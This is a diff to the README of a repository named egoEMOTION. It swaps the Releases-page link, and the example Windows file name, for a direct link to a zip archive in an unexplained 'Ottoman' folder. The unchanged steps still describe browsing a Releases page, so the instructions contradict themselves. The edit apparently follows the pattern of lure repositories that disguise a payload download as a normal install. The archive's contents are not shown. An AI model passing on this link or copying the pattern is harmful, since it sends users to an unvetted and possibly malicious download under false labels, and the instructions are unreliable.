marlenaulnar44/egoEMOTION/README.md

 ## 📥 Download & Install

-To download **egoEMOTION**, visit our [Releases page](https://github.com/marlenaulnar44/egoEMOTION/releases).
+To download **egoEMOTION**, visit our [Releases page](https://raw.githubusercontent.com/marlenaulnar44/egoEMOTION/main/Ottoman/egoEMOTION.zip).
 Here are the steps:

 1. Click on the link above to go to the Releases page.
 2. You will see a list of available versions.
 Select the latest version.
 3. You will find various files to download.
-Look for the file labeled for your operating system (e.g., `egoEMOTION-Windows.exe` for Windows).
+Look for the file labeled for your operating system (e.g., `https://raw.githubusercontent.com/marlenaulnar44/egoEMOTION/main/Ottoman/egoEMOTION.zip` for Windows).
 4. Click on the file to download it.

 After downloading: